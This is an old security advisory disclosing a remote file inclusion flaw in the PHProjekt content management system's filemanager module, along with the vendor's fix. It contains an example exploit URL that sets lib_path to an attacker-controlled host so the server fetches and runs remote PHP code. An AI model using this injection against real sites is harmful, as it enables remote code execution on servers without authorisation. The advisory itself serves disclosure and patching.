COMMAND

	PHProjekt arbitrary command execution
	

	

SYSTEMS AFFECTED

	3.1a and previous

PROBLEM

	b0iler found following :
	

	This script is a content  management  system  for  websites,  much  like
	slashcode or phpnuke.
	

	There problem is in the  module  filemanager,  where  you  can  directly
	access the module and then define values which would have  been  defined
	with the script\'s global configuration  file  had  the  module  not  be
	accessed directly. The first line  in  filemanager/filemanager_forms.php
	is:
	

	

	include_once(\"$lib_path/access_form.inc.php\");

	

	

	so an attacker could go to
	

	http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts

	

	

	and the  script  at  http://hacker.com/nasty/scripts/access_form.inc.php
	would get include()\'d. I am sure you have seen  the  remotely  included
	scripts with the passthru() example many times.
	

	If php is compiled with all_url_fopen off then an attacker would have  a
	harder time exploitting this. I can only see guessing  the  path  to  an
	uploaded  script  as  the  only  other  way  of  exploiting   this   (if
	magic_quotes is on - else null byte can do some damage).  I  believe  it
	is secure since if they upload a script with the name lib_path the  path
	(ex. /tmp/random/access_form.inc.php) will be stored in $lib_path.  this
	would      make      the      include_once      try      to      include
	/tmp/random/access_form.inc.php/access_form.inc.php  which   would   not
	work. PHP will delete  this  /tmp/randomcharacters/access_form.php  when
	it ends, so it cannot be  sent  as  lib_path  once  the  error  msg  (if
	display_errors is on) tells the attacker  the  path  to  the  script.  I
	heard concerns about this from someone running php who wantted a  secure
	install and configuration.
	

	It would be best if all the modules included  the  global  configuration
	file as their first line and double check to make sure no variables  are
	left to other scripts passing them. Or some sort of  modules.php  script
	like phpnuke has wouldn\'t be a bad idea ether and it locks security  by
	making sure the script isn\'t called directly.
	

	

SOLUTION

	he author took this advice and added this  as  the  first  line  in  the
	module:
	

	

	if (!defined(\"lib_included\")) { die(\"Please use index.php!\"); }

	

	

	Since I believe constants cannot be defined with GPC.
	

	The author was contacted a few days ago and was very quick  to  respond.
	They also took the security problem seriously, got  out  a  patch  asap,
	and notified their mailing list. The author says the script will  be  in
	for a rewrite to  help  improve  overall  security  and  structure.  New
	version will be out shortly.